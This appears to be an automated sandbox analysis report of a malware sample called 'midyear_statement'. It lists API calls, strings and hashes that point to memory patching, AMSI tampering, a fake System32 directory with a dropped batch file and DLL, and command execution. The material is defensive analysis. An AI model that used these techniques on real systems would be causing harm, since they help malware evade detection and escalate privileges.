• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: 833ce6947aca4174376685b5a935ece15b52e058633259bfbb11297cabd142f4
• Instruction ID: 0c587730a93cf5f6d4f2943bed2987fe622957abfbfbc2553f18397d138f69c8
• Opcode Fuzzy Hash: 833ce6947aca4174376685b5a935ece15b52e058633259bfbb11297cabd142f4
• Instruction Fuzzy Hash: 1DF0E9761493117DE150A1645C40EFF239CCBC2768F088A3AB9D4A7180D666A914C2F5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\System32\ntdll.dll, xrefs: 040B7900
                                                                                                                                                                                          • NtAllocateVirtualMemory, xrefs: 040B78FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                          • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                          • API String ID: 421316089-2206134580
                                                                                                                                                                                          • Opcode ID: 5a773ca64b4bd0c36625993a59013230612cc9f76ba98992e035e8f587ec723d
                                                                                                                                                                                          • Instruction ID: 7d66b74d9bcb81993cd9b64767524bed3d9ac1872cfaaa0cca386af974e85632
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a773ca64b4bd0c36625993a59013230612cc9f76ba98992e035e8f587ec723d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01AB224030CBFDB40DFA8D841FDA37ACEB1C614F048411BA04EB100DA71E9908BF8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\System32\ntdll.dll, xrefs: 040B7900
                                                                                                                                                                                          • NtAllocateVirtualMemory, xrefs: 040B78FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                          • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                          • API String ID: 421316089-2206134580
                                                                                                                                                                                          • Opcode ID: ef807bbd041a9f5853a735ebc811bbec02c5bbbd7b4693b3515c26b6078d562a
                                                                                                                                                                                          • Instruction ID: 7cdb7f777c2bbc7c4e92550b7d8ba0d26b7ae339e9ba5260884b5ff7f2825f36
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef807bbd041a9f5853a735ebc811bbec02c5bbbd7b4693b3515c26b6078d562a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91E01AB214030CBFDB40DFA8D841FCA37ACEB1C614F048411BA04EB100CA71E9908BF8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE3B
                                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE6B
                                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 040BCE80
                                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 040BCEAC
                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 040BCEB5
                                                                                                                                                                                            • Part of subcall function 040A4BD0: SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                                          • Opcode ID: bc2008bf77e654ca009716b9ed86ac5eaa66af32e927b01fec1c029c5d5ed003
                                                                                                                                                                                          • Instruction ID: 140e92746aa711e83745ea131eaf7a6a947e0bcadac93e097cbbfdb5173f932b
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2008bf77e654ca009716b9ed86ac5eaa66af32e927b01fec1c029c5d5ed003
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1821CD75A54208BBFB11EAE4CC42FDEB7BCAB48708F500465B640F72C1DAB4BA158799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 040BD30E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                          • Opcode ID: 2406cde81fcd3f720dd18db98174af258e6d44aeca2744e7adad19645aea4128
                                                                                                                                                                                          • Instruction ID: 56ea444870f7f85f2d6b329f35d4a7e7ce2a79baa8b0c2fa0a83fa393ee58219
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2406cde81fcd3f720dd18db98174af258e6d44aeca2744e7adad19645aea4128
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C411D39A50209AFEB00EBE4D841EDEB3B9EF5960CF254531E040B7641DBB5BD218B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 040A4E90: SysAllocStringLen.OLEAUT32(?,?), ref: 040A4E9E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 040B6CB0: CLSIDFromProgID.OLE32(00000000,?,00000000,040B6CFD,?,?,?,00000000), ref: 040B6CDD
• CoCreateInstance.OLE32(?,00000000,00000005,040B6DF0,00000000,00000000,040B6D6F,?,00000000,040B6DDF), ref: 040B6D5B
Yara matches
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
  • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
  • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
  • Part of subcall function 040BCD1C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
  • Part of subcall function 040BCD1C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
  • Part of subcall function 040BCD1C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
  • Part of subcall function 040BCD1C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
  • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
• WinExec.KERNEL32(00000000,040C9BC4), ref: 040C3438
• Sleep.KERNEL32(00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000,UacInitialize,04100344), ref: 040C35B6
• DeleteFileA.KERNEL32(00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000,UacInitialize), ref: 040C35EA
• DeleteFileA.KERNEL32(00000000,00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000), ref: 040C3624
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c "), ref: 040C365E
• WinExec.KERNEL32(00000000,040C9C7C), ref: 040C4691
Yara matches
Similarity
• API ID: File$Delete$ExecPath$AddressAttributesCloseCreateHandleLibraryLoadModuleNameName_ProcSleepWrite
• String ID: .exe$.url$C:\Users\Public\$C:\Windows \System32\$C:\Windows \System32\KDECO.bat$C:\Windows \System32\netutils.dll$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$cmd /c "
• API String ID: 693508201-254220744
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 11391->11796 11392->11391 11560->11559 11586->11238 11587->11586 11795->11796 11796->11101
APIs
  • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
  • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
  • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
  • Part of subcall function 040BD598: RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
  • Part of subcall function 040BD598: RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
  • Part of subcall function 040BD598: RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
• WinExec.KERNEL32(00000000,00000000), ref: 040C5B1D
  • Part of subcall function 040B9E10: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 040B9ED3
• RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,04100344,040C9768,UacScan,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C609F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
• String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
• API String ID: 897696978-872072817
• Opcode ID: 7709b78fe94aedee2ffe67b0b40eb60f5718656f5af43a7ddb28b9fde174e24e
• Instruction ID: 7e7dc9536782209da19b223ae2d0cc7d3775e22953a15af52f612677ccee3e3f
• Opcode Fuzzy Hash: 7709b78fe94aedee2ffe67b0b40eb60f5718656f5af43a7ddb28b9fde174e24e
• Instruction Fuzzy Hash: DF921B38A411598FE720EBA4D980EDEB3F9EB85308F1445F5A048BB614DBB4BE95CF41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,?,040A1FC1), ref: 040A17D0
• Sleep.KERNEL32(0000000A,00000000,?,040A1FC1), ref: 040A17E6
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 31e6b3f594db8c71bf61228af07e952956d9025903babca37a159df0a7d6f0d4
• Instruction ID: b3a90d60549a8dbb959ffbe793c1bcc2b28dd4bb2a13d44be15b015059557dc8
• Opcode Fuzzy Hash: 31e6b3f594db8c71bf61228af07e952956d9025903babca37a159df0a7d6f0d4
• Instruction Fuzzy Hash: 72B143726007518BCB15CFA8D880B59FBE0EF85354F1882BED406AF385E738B861CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B01
• GetProcAddress.KERNEL32(00000000,kernel32), ref: 040B7B07
• VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID: irtualProtect$kernel32
• API String ID: 2099061454-2063912171
• Opcode ID: 5e7b4f2ef62cfa77bdf50750ebc65fec9db39a6c78f13224a972fab3e11c8963
• Instruction ID: 8ea331762878d459a7f0e098457de4fb35dbbb8757ff4ec5df9e54a24dd93768
• Opcode Fuzzy Hash: 5e7b4f2ef62cfa77bdf50750ebc65fec9db39a6c78f13224a972fab3e11c8963
• Instruction Fuzzy Hash: FF017174200248AFE701EFE4DC41FDAB7ACEB88718F504460F544F7640C671FE508A68
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,?,?,00000000,040A1FE4), ref: 040A1B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,040A1FE4), ref: 040A1B31
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: ae7c2b19068e25a8dddae24a740692f358ca877e0eff5f7d33bd9f2eeb1a6620
• Instruction ID: c2e8cbaaca422acf88d075a9bafb78c07c60e3394d943088f1b7b42e469383c2
• Opcode Fuzzy Hash: ae7c2b19068e25a8dddae24a740692f358ca877e0eff5f7d33bd9f2eeb1a6620
• Instruction Fuzzy Hash: AA51C1716113408FE715CFA8D984B5ABBD0EF45318F1882BED445EF282E778E869C791
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 040BD30E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                          • Opcode ID: 295d627bc7b0683ce93cf15e2436bb0fbcfa4020f902a70c9c17c37c75d6654e
                                                                                                                                                                                          • Instruction ID: c00c8a5fcf09a4791153f6c132c67c025ef487ec8175c4e6161450f0fe462c1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 295d627bc7b0683ce93cf15e2436bb0fbcfa4020f902a70c9c17c37c75d6654e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D410C39B50209AFEB00EBE4D841EDEB3B9EF5960CF254531E040B7641DBB5BD218B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5BCC
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5BFA
                                                                                                                                                                                            • Part of subcall function 040A7CD4: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,040B3844,040B5C3A,00000000,040B5CB8,?,?,040B3844), ref: 040A7D22
                                                                                                                                                                                            • Part of subcall function 040A7EDC: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,040B3844,040B5C55,00000000,040B5CB8,?,?,040B3844,00000001), ref: 040A7EFB
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,040B5CB8,?,?,040B3844,00000001), ref: 040B5C5F
                                                                                                                                                                                            • Part of subcall function 040AA6BC: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,040AC31D,00000000,040AC377), ref: 040AA6DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                                          • Opcode ID: 5ac64c2e1248eff4e081b531386e6801e5fd2f4e5d7d1189c79a4ab7702f009e
                                                                                                                                                                                          • Instruction ID: d4ea2fff9c80e88e3093998946ae6b3afd8570ba8afda8d18dd62477930075d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac64c2e1248eff4e081b531386e6801e5fd2f4e5d7d1189c79a4ab7702f009e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1317E70A006089FEB01EFE8CC81BDEB7F5AB4870CF548165D944B7380D779AE158BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
